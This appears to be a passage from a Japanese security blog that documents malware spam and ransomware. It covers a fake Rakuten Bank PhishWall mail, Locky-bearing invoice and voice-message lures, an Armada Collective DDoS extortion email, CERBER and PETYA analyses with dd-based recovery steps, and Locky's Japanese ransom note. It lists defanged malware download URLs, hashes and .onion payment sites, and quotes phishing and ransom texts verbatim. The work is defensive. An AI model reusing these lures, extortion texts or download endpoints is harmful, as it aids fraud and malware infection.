ウイルス、マルウェア(Malware)

楽天銀行を騙った PhishWall プレミアムのインストールを促す不審なメール

楽天銀行を騙った PhishWallプレミアムのインストールを促す不審メール

「【重要】不正送金・フィッシング対策ソフト「PhishWallプレミアム」提供開始について」という件名で、楽天銀行をかたる不審なメールが確認されています。本文中の「もっと詳しくの情報はこちら」のリンクをクリックするとバンキングマルウェア(Urlsnif・DreamBot)がダウンロードされます。

phishwall

送信者

楽天銀行 myinfo@rakuten.co.jp

件名

【重要】不正送金・フィッシング対策ソフト「PhishWallプレミアム」提供開始について

本文

尊敬するお客様へ

いつ楽天銀行をご利用いただき誠にありがとうございます。

楽天銀行では平成11月29日(水)より当行のホームページや「道銀ダイレクトサービス」をより安心してご利用いただけるよう、不正送金・フィッシング対策ソフト「PhishWallプレミアム」の提供を開始しました。

無料でご利用いただけるサービスですので、是非インストールしてご利用くださいますようお願い申し上げます。

なお、既に他社サイト等で「PhishWallプレミアム」をインストールされている場合は、あらためてインストールする必要はございません。

もっと詳しくの情報はこちら(hxxp://hu。digitaltraceforensics。com)

◆本メールのアドレスは送信専用となっております。

返信メールでのお問い合わせは承りかねますので、あらかじめご了承願います。

PhishWall 開発元のセキュアブレイン(SecureBrain)からの注意喚起

関連リンク

ランサムウェア Locky を添付した不審メール(Scanned from Lexmark)

ランサムウェア Locky を添付した不審メール(Scanned from Lexmark)

スポンサーリンク

受信日時

  • Thu, 09 Nov 2017 18:49:07 +0530

件名

  • Scanned from Lexmark

差出人

  • copier@nifty.com

本文

なし

本文(日本語訳)

なし

添付ファイル

  • image2017-11-09-832017.doc

添付ファイルの分析

  • 添付ファイルを開くと VBScript が実行され、ランサムウェアLocky をダウンロード実行する。これにより、PC内のファイルが暗号化されてしまう。
  • VirusTotal https://www.virustotal.com/ja/file/bf2ef3c514cbea1e55d6829746550968b192e067d882a2ba2afabf0b79d968c5/analysis/
      • HEUR:Trojan.WinLNK.Agent.gen (Kaspersky
      • RDN/Autorun.worm.gen (McAfee)
      • TrojanDownloader:O97M/Powdow.F (Microsoft)
      • W97M.Downloader (Symantec)
      • TROJ_POWLOAD.AUSJSL (Trendmicro)
  • VBScript
    • hxxp://67199419/hjkdfhJH73td
      hxxp://purenergyit/hjkdfhJH73td
      hxxp://phonecenter24de/hjkdfhJH73td
      hxxp://procuradores-elchecom/hjkdfhJH73td
      hxxp://tciseventhworldcom/hjkdfhJH73td
      hxxp://wayfarerbestcom/309

    2017/11/11 出会い系を装ったSPAMメール

    2017/11/11 出会い系を装ったSPAMメール

    スポンサーリンク

    受信日時

    • Fri, 10 Nov 2017 20:05:40 +0200

    件名

    • hi

    差出人

    • "Anna" <Annaqpul@buffetdossonhos.com.br>

    本文

    Hello, my dear!
    I want to say to you that I am thinking about you every day, every night, every minute!
    I am still waiting for your letter. My email anetah8uge@rambler.ru

    本文(日本語訳)

    こんにちは、親愛なるあなたへ! 

    私は毎日、毎晩、毎分あなたのことを考えていています!  まだ私はあなたの手紙を待っています。私の電子メールアドレスは、anetah8uge@rambler.ru です。

    添付ファイル

       
    • なし

    Armada Collective を名乗る攻撃者からの DDoS 攻撃による脅迫(RANSOM DDoS)

    FX事業者や仮想通貨取引所、証券会社などの金融機関を狙った DDoS 攻撃による脅迫(RANSOM DDoS)が多発しています。 被害にあった企業には Armada Collective を名乗る攻撃グループから DDoS攻撃の停止と引き換えにビットコインでの金銭の支払いを要求する脅迫メールが送られているようです。

    脅迫メールの例

    FORWARD THIS MAIL TO WHOEVER IS IMPORTANT IN YOUR COMPANY AND CAN MAKE DECISION!

    We are Armada Collective.
    hxxp:// Imgtfy.com/?q=Armada+Collective

    Most importantly, we have launched largest DDoS in Swiss history and one of the largest DDoS attacks ever. Search for "ProtonMail DDoS"

    All your servers will be DDoS-ed starging Monay (XXX XX) if you don't apy protection fee - exactly 10.08 Bitcoin @ XXXXXXXXXXXXXXXXXXXXXXXXXX

    If you don't pay by Monday, attack will start, yours service going down permanently price to stop will increase to 20 BTC and will go up 10 BTC for every day of attack.

    This is not a joke.
    Our attacks are extremely powerful - peak over 1 Tbps second.

    Do not reply, we will not read. Pay and we will know its you. AND YOU WILL NEVER AGAIN HEAR FROM US!
    Bitcoin is anonymous, nobody will ever know you cooperated.

    被害情報

    日時 被害企業 業種 アナウンスなど
    09/14 09:10 マネーパートナーズ FX
    09/15 7時頃 DMM.com証券 FX
    09/15 9時頃 Zaif 仮想通貨
    09/16 09:53 FXトレード・フィナンシャル FX
    09/18 08:XX みんなのビットコイン 仮想通貨
    09/18 10:15-1128頃 ヒロセ通商 FX

    本日10時15分頃より、当社サイトに対するサイバー攻撃(DDOS攻撃)があり、取引ツールへのログイン、当社ホームページへアクセスし難い状況になっておりました。
    11時28分頃に復旧し、取引ツールへのログイン、ホームページへのアクセスは可能となっております。

    http://hirose-fx.co.jp/index.php?aid=Mt_MtView&page=108140&pageIndex=0

    09/18 10:15-11:28頃

    JFX

    FX

    本日10時15分頃より、サイバー攻撃(DDOS攻撃)があり、取引ツールへのログイン、 当社ホームページへアクセスしずらい状況になっておりました。 11時28分頃に復旧し、取引ツールへのログイン、ホームページへのアクセスは可能と なっております。

    http://www.jfx.co.jp/

    09/20 17:44頃-

    ビットフライヤー

    仮想通貨

    【仮想通貨】国内取引所ビットフライヤーが突然繋がらなくなる障害が発生 → ネット民激怒!!http://coinmatomesokuho.blog.jp/archives/3920946.html

    09/20 04:00-22:00

    デューカスコピー・ジャパン

    FX

    9月20日以降に発生したサイバー攻撃について https://www.dukascopy.jp/home/

    • 日本時間2017年9月21日4時00分から5時44分までの間
    • 日本時間2017年9月21日18時15分から18時30分までの間
    • 日本時間2017年9月21日18時50分から18時59分までの間
    • 日本時間2017年9月21日21時08分から26時45分までの間
    • 日本時間2017年9月22日21時50分から22時00分までの間

    09/21 10:00復旧

    東洋証券

    証券

    ネット入金サービス障害【復旧】のお知らせ http://www.toyo-sec.co.jp/news/2017/hometrade/170921_3075.html

    09/21 8時頃- コムテックス FX
    09/21 09:15 外為ドットコム FX
    09/21 10:15 上田ハーロー FX
    09/21 18時頃 BTCボックス 仮想通貨
    09/22 10:06 マネースクウェア・ジャパン FX
    09/22 18:20-19:00頃 セントラル短期FX FX https://www.central-tanshifx.com/newsrelease/2017/0922-03.html

    関連情報リンク

    関係者によると、「Armada Collective」と名乗る差出人からメールが送り付けられた。期日を定めた上で、約300万円相当のビットコインを支払わなければ、全てのネットワークにDDoS攻撃を始めるなどと脅迫する内容だった

    Voice Message を装った Locky ランサムウェア添付スパムメール

    Voice Message を装った Locky ランサム添付スパムメール

    概要

    2017年9月25日、ボイスメッセージを装ったランサムウェアが添付されたスパムメールを受信しました。電話番号020XXXXXXXから XX秒のメッセージを預かっています」といった内容で、Voice Message(電話番号).7z のファイルが添付されています。この添付ファイルは、Locky と呼ばれるマルウェア亜種をダウンロード実行するスクリプトが入っており、実行するとPC内のファイルが勝手に暗号化されてしまいます。

    スポンサーリンク

    受信日時

    • 2017年9月25日 18:38 +07:00

    件名

    • Message from XXXXXXXXXXX (電話番号)

    差出人

    本文

    25/09/25/2017,18:38:XX PM

    36,1-second message deposited by 020XXXXXXXX

    添付ファイル

    • Voice Message(020XXXXXXXX).7z
      • MD5: C4A98D60411C7A84AA8E84B656008BB5
      • SHA1: E36777E044CADC9B011A4EEDC451C8CDA54D1AC1
    • Voice Message(020XXXXXXX).vbs
      • MD5: E5AFD128F49E0C11F7D4190CAD5D66A0
      • SHA1:B5FBC44EA70DF1716BF1B0C49C6326EA160ABBB6

    マルウェア添付メール: 件名 Your Invoice #XXXXXX (6桁数値) 2017-09-22

    マル ウェア添付メール: 件名 Your Invoice #XXXXXX (6桁数値) 2017-09-22

    キーワード: フィッシング, マルウェア, ランサムウェア, Locky, 暗号化, Phishing, Malware, RANSOMWARE

    YOURINVOICE

    概要

    2017-09-22 に請求書を装ったマルウェア添付メールを受信しました。メール本文は、「このメールを誤って受信したと思われる場合は、このメールに返信して必要な修正をお知らせください。」との内容になっており、添付ファイルを誤って実行してしまうとランサムウェアと呼ばれるマルウェア(Locky亜種)に感染してしまいます。

    件名

    • Your Invoice # XXXXXX (6桁数値)

    送信元メールアドレス

    • April.Behymer @ zhenskysait.ru

    本文

    Your Invoice is attached. 

    If you feel you have received this email in error, please reply to this email to inform us of any necessary corrections.

    添付ファイル

    • Invoice_file_XXXXXX.7z (7zip の中身は Invoice_file_XXXXX.vbs)

    通信先

    • ar-inversiones.com/jhdsgvc74?
    • ideathlike.net/p66/jhdsgvc74?
    • arktupala.com/jhdsgvc74?

    マルウェア

    ファイルパス

    • C:\Users\Administraotr\AppData\Local\Temp\gWCIrkQ.exe (ファイル名はランダムなアルファベット)

    ハッシュ値

    • MD5: 511756FB6E203EF95813B576A59AF46E
    • SHA1: 7B1049A49E6A0C4480AA391701FE6A469DA2059B

      マルウェア種別

      支払いサイト

      • g46mbrrzpfszonuk.onion/NKPCXXXXXXXXX

      関連リンク

      スポンサーリンク

      Amazon Marketplace を騙るマルウェア添付メール: Invoice RE-2017-09-21-xxxxx

      Amazon Marketplace を騙るマルウェア添付メール: Invoice RE-2017-09-21-xxxxx (5桁の数値)

      キーワード: フィッシング, マルウェア, ランサムウェア, Locky, 暗号化, 復号, 復旧

      概要

      Amazon Marketplace UK を騙るウイルス添付メールが出回っています。件名は、「Invoice RE-2017-09-21-xxxxx (5桁の数値)」となっています。添付ファイルは、Locky と呼ばれるランサムウェアと呼ばれるマルウェアをダウンロードするスクリプトとなっていて、実行するとランサムウェアに感染してPC内のファイルが暗号化されてしまいます。注意してください。

      RE-2017-09-21

      送信元メールアドレス

          Amazon Marketplace <EbjkwcXXXXXXXX @marketplace.amazon.co.uk>

      添付ファイル

          RE-2017-09-21-xxxxx.7z (7zipファイルの中身は RE-2017-09-21-xxxxx.vbs)

      添付ファイル(RE-2017-09-21-xxxxx.vbs)の通信先ドメイン

      • agricom.it/IUGiwe8
      • fulcar.info/p66/IUGiwe8
      • 81552.com/IUGiwe8

      件名

          Invoice RE-2017-09-21-xxxxx (5桁の数値)

      本文

      ------------- Begin message -------------

      Dear customer,

      We want to use this opportunity to first say "Thank you very much for your purchase!"

      Attached to this email you will find your invoice.

      Kindest of regards,
      your Amazon Marketplace

      ===

      ------------- End message -------------

      For Your Information: To help arbitrate disputes and preserve trust and safety, we retain all messages buyers and sellers send through Amazon.co.uk. This includes your response to the message below. For your protection we recommend that you only communicate with buyers and sellers using this method.

      Important: Amazon.co.uk's A-to-z Guarantee only covers third-party purchases paid for through our Amazon Payments system via our Shopping Cart or 1-Click. Our Guarantee does not cover any payments that occur off Amazon.co.uk including wire transfers, money orders, cash, check, or off-site credit card transactions.

      We want you to buy with confidence whenever you purchase products on Amazon.co.uk. Learn more about Safe Online Shopping (http:// www.amazon.co.uk /gp/help/customer/display.html?nodeId=110xxxxx) and our safe buying guarantee (http:// www.amazon.co.uk /gp/help/customer/display.html?nodeId=31xxxxx).

      感染マルウェア

      ファイルパス

      •     C:\Users\Administrator\AppData\Local\Temp\EdxqdRAX.exe (ファイル名はランダムなアルファベット)

      ハッシュ値

      • MD5: 939C552FBC07410A99400EBCBCAFCC2F
      • SHA1: BC75609DFC7D72B92DA6DA37CD60A96DD56A0D84

      マルウェア種別

      暗号化されたファイルの拡張子

      • ykcol

      支払いサイト

      • g46mbrrzpfszonuk.onion

      脅迫文

      $$_+|--==- - * | _

      !!! IMPORTANT INFORMATION !!!!

      All of your files are encrypted with RSA-2048 and AES-128 ciphers.
      More information about the RSA and AES can be found here:
         http://en.wikipedia.org/wiki/RSA_(cryptosystem)
         http://en.wikipedia.org/wiki/Advanced_Encryption_Standard

      Decrypting of your files is only possible with the private key and decrypt program. which is on our secret server.
      To receive your private key follow one of the links.

      If all of the addresses are not available, follow these steps:
        1. Download and install Tor Browser: https://www.torproject.org/download/download-easy.html
        2. After a successful instration, run the browser and wait for initialization.
        3. Type in the address bar: g46mbrrzpfszonuk.onion/NKPCXXXXXXXXXXXX
        4. Follow the instructions on the site.

      !!! Your personal identification ID: NKPCXXXXXXXXXXXX
      =_*$+|| ++
      |$$_-*=_++*$=
        ._=| *|.*$=-

      関連リンク

          Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法(http://rootdown.cocolog-nifty.com/memo/2016/03/locky-virus---e.html)

      スポンサーリンク

      音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

      音声で脅迫するファイル暗号化ランサムウェア CERBER の対処方法

      キーワード: Ransomware, ランサムウェア, 復号, 解除, 暗号化, 解除ツール, 復号ツール, Decryptor 

       

      このエントリーをはてなブックマークに追加

      1. CERBER 概要

      スポンサーリンク

      ランサムウェア(ransomware)とは、感染するとハードディスク内のファイルを勝手に暗号化して脅迫し、復号・解除キーと引き換えに金銭を要求するマルウェア(ウイルス)です。ランサムウェアには、CryptoLocker や TeslaCrypt、 Locky など多くの種類があります。これらのランサムウェアは、暗号化すると脅迫文を表示して金銭を要求するものでしたが、CERBER と呼ばれるマルウェアは音声で脅迫します。また、身代金の支払い期限が設定されており、期限が過ぎると身代金の金額を吊り上げ、支払いを迫ります。

      ランサムウェア CERBER は、メール添付ファイル経由より、改ざんされたウェブサイトや広告にアクセスすることで感染するケースが多いようです。改ざんされウェブページにアクセスすると、ウェブブラウザのプラグインである Flash Player や Java などの脆弱性を攻撃するエクスプロイトキット (Magnitude Exploit Kit や Rig Exploit Kit など) を設置したサイトにリダイレクトされ、攻撃が成功すると Cerber がダウンロード実行されて感染します。

      CERBER は、何度かバージョンアップされており、2016年11月末にはデータベースファイルを暗号化する機能を追加したバージョン 4.x が確認されています。トレンドマイクロの調査によると、CERBER 4.0 で暗号化対象となるデータベースファイルとしては、Microsoft Access、SQL Server, MySQL, Oracle、MySQL のほか、会計ソフト、給与計算ソフト、医療管理データベースソフトウェアに関連するファイルも含まれています。

      2. CERBER による暗号化と脅迫文

      CERBER に感染後のデスクトップ画面

      他のランサムウェア(ransomware)と同じく、感染後にディスクトップの壁紙が脅迫文に変更されます。

      cerber4

      CERBER の脅迫文

      脅迫文は多数の言語に対応しており、日本語に対応しています。ファイル形式は、HTML ではんく HTA 形式となっています。

      cerber0

      3. CEBER で暗号化されたファイルの復号方法(1回のみ)

      CERBER の脅迫文に記載されているパーソナルページで、無料で 1つファイルの復号を試すことができます。

      ※ 購入を推奨している訳ではありません。

      Tor ブラウザで脅迫文に記載されているパーソナルページにアクセスすると、言語を選択する画面が表示されます。日本語、中国語、ロシア語など多くの言語に対応しているようです。

      cerber1

      ロボットアクセス回避のためのキャプチャ認証が入っていました。

      セキュリティ上の理由のため、以下でロボットではなく、ヒトであることを確認してください。

      cerber2

      メニュー画面が表示されます。支払い期限の時間などが表示されています。このページの上部に「1つのファイルを無料で復号化」というメニューがあります。

      ドキュメント、写真、データベース、その他の重要なファイルは暗号化されています!

      ファイルを復号するには、特別なソフトウェア - <<Cerber Decryptor>> をご購入いただく必要があります。
      すべての取引は bitcoin ネットワーク内でのみ実行されます。
      これから5日間だけ、B1.000の特別価格でこの製品をお求めいただけます。
      5日経過後は、この製品の価格はB2.000になります。

      スポンサーリンク

      cerber3

      上記メニューから「1つのファイルを無料で復号化」にアクセスすると、無料で1つのファイルを復号できる特別な機会!」と書かれたページが表示されます。「ファイルをアップロード」のボタンを押して、復号したいファイルを選びます。復号できるファイルは、サイズが2048バイトまでになっています。

      今なら、無料で1つのファイルを復号化できる特別な機会!
      サービスが本当に役に立つかどうかを確認後、<<Cerber Decryptor>> プログラムにお払い頂いた後で、1つのファイルを復号化することができます

      cerber6

      復号が成功すると「復号化されたファイルのダウンロード」というボタンが表示されるので、クリックしてダウンロードします。

      cerber8

      ダウンロードされるファイル名は Decrypted.zip となっており、解凍・展開すると復号されたファイルが確認できました。

      cerber10

      4. CERBER で暗号化されたファイルの復号方法

      スポンサーリンク

      初期の CERBER バージョン1 については、トレンドマイクロからファイルの暗号化を解除するツール( Ransomware File Decryptor )が提供されています。

      5. 関連URL

      PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

      PETYA ウイルス - MBRを書き換えてPCを起動不能にするランサムウェア

       

      スポンサーリンク

       

      キーワード: PETYA、ウイルス、マルウェア、ランサムウェア、復元、復号、復旧、decrypt、MBR、MFT、ransomware, Virus

      このエントリーをはてなブックマークに追加

       

      目次

       
         

      1. PETYA ウイルスとは

         

      2. PETYA ウイルス感染時の画面

         

      3. 書き換えられたMBR、MFTなど

         

      4. ファイルの復旧について

         

      5. 暗号化されたディスクの復号方法

       

      1. PETYAウイルスとは

       

      PETYAウイルスは、感染するとMBRMFT(マスターファイルテーブル)を上書きしてPCを起動不能するランサムウェアの一種です。PETYAウイルスを実行すると、Windowsが急に落ちて、システム再起動が発生します。PCを起動するとドクロマークの絵を表示した後、ハードディスクを軍事レベルのアルゴリズムで暗号化した、復号するための鍵を購入するために手続きをするように要求する文書を表示します。要求額は約0.9 BITCOINになっていました。

       

      PETYA ウイルスに感染させてハードディスクの内部を確認したところ、ハードディスク全体が暗号化されている訳ではなく、MBRとMFTが部分的に書き換えられているだけのようでした。ファイルのデータは暗号化されずに残っているようです。また、軍事的なレベルのアルゴリズムで暗号化と書いてありましたが、MFTの書き換えはXOR処理のように見えます。

       

      PETYAウイルスのプログラムコードを解析した訳ではなく、ハードディスクの一部を調査しただけなので正確ではないかもしれませんが、ハードディスク内のファイルデータは残っているようです。しかし、MFTが書き換えられているので、ファイル名やデータが格納されている位置(クラスタ番号)などがわからないので、ちゃんと復旧するのは大変そうです。foremost などのデータカービングソフトを使えば、ヘッダ・フッダが規定されているものについては、ある程度自動で復元できそうです。MFTレコード内に直接データが保存される小さなサイズのファイルに関しては、データが書き換えられてしまっていると思います。

       

      NTFS 以外のファイルシステムの場合どうなるのかは調べられていません。

       

       

      2. PETYA ウイルスに感染時の画面

       

      スポンサーリンク

       

      ① PETYAウイルスを実行すると、強制的に Windows が落ちてシステム再起動がかかります。

       

      petya_ico

       

      ②PCが立ち上がると、リカバリのための CHKDSKを実行しているような画面が出てきます。

       

      PETAYA-1

       

      ③ ②が終わると、赤白点滅させながらドクロマークの絵を表示します。

       

      PETYA-2PETYA-3

       

      ④ ハードディスクを暗号化したこと、復号するための鍵の購入方法が表示されます。

       

      PETYA-4

       
         

      You became victime of the PETYA RANSOMWARE!

         

      The harddisks of your computer have been encrypted with an millitary grade encryption algorithm. There is no way to restore your data without a special key. You can purchase this key on the darknet page shown in step 2.

         

      To purchase your key and restore your data, please follow these three easy steps:

         

      1. Download the Tor Browser at “https://www.torproject.org/”. If you need help, please google for “access onion page”.

         

      2. Visit one of the following pages with the Tor Browser:

         

         http://petyaXXXXXXXX

         

         http://petayaXXXXXXX

         

      3. Enter your personal decryption code there:

         

         XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX…

         

      If you already purchased your key, please enter it below.

       

       

      3. 書き換えられたMBR、MFTなど

       

      スポンサーリンク

       

       

      暗号化されたファイルの復旧する 3 つの方法を紹介します。

       

      ①第0ブロック MBRの書き換え

       

      mbr

       

      左が正常なMBR、右がPETYAに書き換えられたMBRです。オフセット 446バイト以降のパーティションテーブルは書き換えられていませんが、前半のブートストラップローダー部分が書き換えられていることがわかります。

       

       

       

      ②第1ブロックから第33ブロック目の書き換え

       

      block1-33

       

      第0ブロック目のMBR以降、第1ブロックから第33ブロック目は通常 0x00 になっていますが、PETYAウイルスによって 0x07 で XOR されているように見えます。XORとは限りませんが。

       

       

       

      ③ 第34ブロック目~第49ブロックまでの書き換え

       

      推測ですがPETYAウイルスに感染後に表示されるドクロマークや案内を表示すると思われるプログラムが入っていました。

       

       

       

      ④ 第50ブロック目以降から第1パーティション直前まで

       

      特に書き換えはないようです。

       

       

       

      MFT(マスターファイルテーブル)の書き換え

       

      MFT-Mirror

       

      左が正常なMFTレコードの一部(MFTMirrのレコード)です。右はPETYAウイルスで書き換えられたMFTレコードになります。正常時の0x0の部分からキーを推測して XOR すると一部は戻せました。途中でパターンが変わるので、そのパターンをプログラム解析で確認できれば復号できそうです。

       

      時間があればもう少し詳しく調べてみたいと思います。

       

       

       

      4. ファイルの復旧について

       

      MBR、MFTは書き換えられていますが、ファイルデータはそのまま残っているようなので、試しにファイルが取り出せるか確認してみました。

       

      感染前の C:\Windows\notepad.exe が クラスタ番号 169258 から 44 クラスタ分あることが分かっていたので、感染後のハードディスクから該当部分を dd コマンドで取り出してみました。

       
         

      # dd if=infected-disk.dd skip=`expr 169258 * 8 + 2048` count=`expr 44 * 8` > notepad.dd

       

      notepad.exe は 179,712バイトなので、末尾の余計な部分をバイナリエディタで削って、MD5ハッシュ値を確認します。

       
         

      # md5sum notepad.dd      
      d378bffb70923139d6a4f546864aa61c  notepad.dd

       

      感染前の C:\Windows\notepad.exe の MD5 のハッシュ値である  d378bffb70923139d6a4f546864aa61c と一致しました。少なくともこの部分のファイルデータは書き換えられてないようです。

       

       

      5. 暗号化されたディスクの復号方法

       

      暗号化されたディスクを復号するための解除キーを解析してくれるサイト(PETYA-PAY-NO-RANSOM)が公開されています。

       

      Petya Ransomware's Encryption Defeated and Password Generator Released http://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/

       

      PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)

       

      上記の PETYA-PAY-NO-RANSOM を利用した PETYA RANSOM の解除を試してみました。暗号化は解除でき、正常にWindowsを起動することが確認できました。試してみた手順を紹介します。

       

      PETYA-PAY-NO-RANSOM に下記①②の情報を貼り付けて「Submit」ボタンを押すと、解除キーが表示されます。このキーをPETYA RANSOMWARE のキー入力画面に、入力すると暗号化が解除されて正常にWindowsを起動することができます。

       
         

      ① 暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報

         

      ② 暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報

       

      上記①②の情報を取得するためのツール Petya Sector Extractor が下記URLで提供さてれています。  Windows 上で動作するGUI プログラムです。

       

      http://download.bleepingcomputer.com/fabian-wosar/PetyaExtractor.zip

       

      今回は、別途 Windows マシンにHDDをつなぎかえるのが面倒だったため、上記 Petaya Sector Extractor は使わずに、Bootable Linux CD でブートして dd コマンドと Base64 コマンドで取得する方法にしました。

       

       

      (1) Bootable Linux CD で PETYA RANSOMWARE に感染したマシンを起動します

       

      Bootable Linux なら何でも良いのですが、今回は Deft Linux を使いました。

       

       

      (2) Linux が起動したら下記のコマンドを実行して①②の情報を取得します

       

      感染したマシンのハードディスクが、デバイス名 /dev/sda として認識されています。この /dev/sda から該当データを取得することになります。下記、具体的なコマンドになります。

       

      ①の暗号化されたハードディスクのセクタ55 のデータをBASE64エンコードした情報を取得

       
         

      deft ~ % dd if=/dev/sda bs=512 skip=55 count=1 2>/dev/null | base64      
      /cc3NxMWNzenSDc3rzs3N+37Nzfq/zc3baU3NyfGNzc3BTc3N8g3N1RtNzdJoTc3K6M3N6tgNzft      
      1zc33P03N/7HNzeTFjc3p7Q3N6/9NzftvDc37P83N+3lNzcn2Dc3NTU3N7c3NzdUbTc3SaI3N6um       
      NzerZDc3bSg3N9z9Nzf9xzc3E1Y3N6cMNzcvfTc37fw3N+r/NzdtZTc3J8Q3NzMHNzc3iDc3Um03       
      N8miNzerIzc3q343N+36Nzff/Tc3/cc3N5NVNzenoDc3r7s3N+07Nzfq/zc3bSU3NyfGNzcxMTc3       
      N/c3N1JtNzdJIjc3K6M3N6tkNzdtqDc33/03N/7HNzcT1Tc3pxQ3N687Nzdtujc37P83N+0lNzcn       
      2Dc3PzU3N7cINzdTbTc3yWI3N6ulNzerfDc37Tk3N9/9Nzf8xzc3ExY3N6cONzevfDc3bTs3N+r/       
      NzdtZTc3J8I3Nz0HNzc3CDc3VW03N0nhNzcrpTc3q2A3N226Nzfe/Tc3/cc3N5NWNzenADc3L/03       
      N+38Nzfq/zc3bWU3NyfENzc7PTc3N0g3N1NtNzdJojc3qyM3N6t+Nzdt+Tc33/03N/vHNzeTFjc3       
      pww3N688NzftOzc36v83N20lNzcnwjc3OT03NzfINzdSbTc3SeE3NyulNzerYDc3bbo3N979Nzc=

       

      ②の暗号化されたハードディスクのセクタ54 のオフセット 33 から 8バイト分のデータをBASE64エンコードした情報を取得

       
         

      deft ~ % dd if=/dev/sda bs=1 skip=`expr 33 \+ 512 \* 54` count=8 2>/dev/null | base64      
      LSgLXoh++aQ=

       

      上記コマンド結果を USB メモリや SSH などのネットワーク経由で取得し保存しておきます。

       

       

      (3) (2) で得た情報を「PETYA-PAY-NO-RANSOM(https://petya-pay-no-ransom-mirror1.herokuapp.com/)」のフォームに貼り付けて Submit します

       

      decrypt1

       

      しばらくすると解除キーが表示されます。ここでは Your key is: の行にある「XxNxRx3xExTxTxsx」が解除キーになります。

       

      decrypt2

       

       

      (4) (3)で表示された解除キーを PETYA の画面に入力します

       

      decrypt4

       

      解除キーを入力すると、復号処理が実行されます。

       

      decrypt5

       

      しばらくすると復号処理が完了すると、マシン再起動の表示が出ます。

       

      decrypt6

       

      再起動すると正常にWindowsが起動します。

       

       

       

      スポンサーリンク

      Locky Virus - 日本語で身代金要求するランサムウェアウイルスの対処方法

      更新日:
      2016-03-29 「感染しないための対策」を追記
      2016-03-27 「感染時の動作」、「Locky Decrytor の購入画面」をを追記

      Locky Virus - 日本語で身代金を要求するランサムウェアウイルスの対処方法

      キーワード: ウイルス、Locky、マルウェア、ランサムウェア、復元、復号、復旧、decrypt, js、javascript、Document2、ransomware, virus, thor, osiris, zzzzz, aesir

      このエントリーをはてなブックマークに追加 

      目次

      1. Locky ウイルスとは

      2. 脅迫文

      3. 暗号化されたファイルの復旧方法

      4. メール添付ファイルの例

      5. Locky ウイルスのダウロードURL

      6. Locky ウイルス感染時の動作

      7. 感染しないための対策

      8. 関連リンク

      スポンサーリンク

      1. Locky ウイルスとは

      Locky ウイルスは、感染するとPC内のファイル(テキストやオフィスファイル、画像、動画ファイルなど)を勝手に暗号化してしまうランサムウェアと言われる種類のウイルスです。暗号化されたファイルは、拡張子が「Locky」 となってしまうことから通称「Locky」と呼ばれています。今までのランサムウェアの脅迫文は日本語対応していないものがほとんどでしたが、Locky は日本語環境であれば日本語の脅迫文を作成して表示します。

      感染経路としては、メール添付ファイルと脆弱性を攻撃するWebサイトの大きく2つがあります。メール添付ファイルでの感染は、実行すると Locky ウイルスをダウンロードして実行する JavaScriptファイルが含まれた ZIP ファイルが添付されているケースが多いです。その他 rar 拡張子の添付ファイルのケースもあります。また、改ざんされたWebサイトでの感染では、そのWebサイトを見ると Adobe Flash などの脆弱性を攻撃して自動的に Locky Virus をダウンロードして実行する手法(ドライブバイダウンロード)による感染が多く報告されています。このWebサイト経由での感染は、Adobe Flash や IE などのソフトウェアを最新にしておけば感染することはほどんどありません。ランサムウェアなどのウイルスに感染しないように、必ずソフトウェアはアップデートして最新のバージョンにしておきましょう。

      1.2. Locky 亜種

      Locky ウイルスが出現して間もなく亜種が出回りはじめました。Locky亜種は、初期のLocky と比べて、ダウンロードされるウイルス本体の実行ファイル形式(EXEからDLL形式)や暗号化後のファイル名の形式、拡張子名(.thor.aesir.zzzzz.osirisなどが変わっています。目的はかわらず、感染PC内のファイルを暗号化して人質にして、身代金(ビットコイン支払い)を要求することです。

      Locky亜種は、主にメールの添付ファイルとして送られてきます。添付されるファイルの形式は、以下が確認されています。

      添付ファイルの形式 ファイルの拡張子
      zip zip
      The Witcher 2 Game Archive dzip
      Microsoft Office doc, docx, docm
        xls, xlsx

      zip, dzip などの圧縮ファイルは、展開すると js, wsf, vbs などのスクリプトファイルが入っており、実行してしまうと Locky 亜種の本体であるDLLプログラムをダウンロードして実行します。

      doc, docm などのMicrosoft Office のオフィスファイルには、開くと Locky亜種をダウンロードするマクロが入っています。

      2. 脅迫文

      Locky ウイルスに感染すると表示される日本語の脅迫文です。
      • _Locky_recover_instructions.bmp

      _Locky_recover_instructions

      • _Locky_recover_instructions.txt

      !!! 重要な情報 !!!!

      すべてのファイルは、RSA-2048およびAES-128暗号で暗号化されています。  
      RSAの詳細については、ここで見つけることができます:  
      http://ja.wikipedia.org/wiki/RSA暗号  
      hxxp://ja.wikipedia.org/wiki/Advanced_Encryption_Standard

      あなたのファイルの復号化は秘密鍵でのみ可能であり、私たちの秘密のサーバー上にあるプログラムを、復号化します。  
      あなたの秘密鍵を受信するには、リンクのいずれかに従います:  
      1. hxxp://i3ezlvkoi7fwyood.tor2web.org/AAF92AC11ABCDEF  
      2. hxxp://i3ezlvkoi7fwyood.onion.to/AAF92AC11ABCDEF  
      3. hxxp://i3ezlvkoi7fwyood.onion.cab/AAF92AC11ABCDEF

      このすべてのアドレスが使用できない場合は、次の手順を実行します。  
      1. ダウンロードして、Torのブラウザをインストールします: hxxps://www.torproject.org/download/download-easy.html  
      2. インストールが正常に完了したら、ブラウザを実行し、初期化を待ちます。  
      3. アドレスバーにタイプ: i3ezlvkoi7fwyood.onion/AAF92AC11ABCDEF  
      4. サイトの指示に従ってください。

      !!! 個人識別ID: AAF92AC11ABCDEF !!!

      • Locky Decryptor 購入画面

      暗号化されたファイルを復元するためのソフトウェアである Locky Decryptor の要求額は 1.0 Bitcoin のようです。日本円に換算すると5万円弱くらいでしょうか。暗号化されたファイルの重要性によっては、払ってしまいそうな金額です。

      脅迫文と同じく、英語、日本語のほか、韓国語、ドイツ語、フランス語、イタリア語など多くの言語をサポートしています。

      身代金を払うことは、犯罪者にお金を払ってしまうことになってしまいますし、犯罪を助長することになってしまうのでお勧めしませんが、バックアップなどから復旧できない大切なデータが被害にあった場合は、身代金を払って復号するしか手はなさそうです。

      LockyDecryptor 

      3. 暗号化されたファイルの復旧方法

      スポンサーリンク

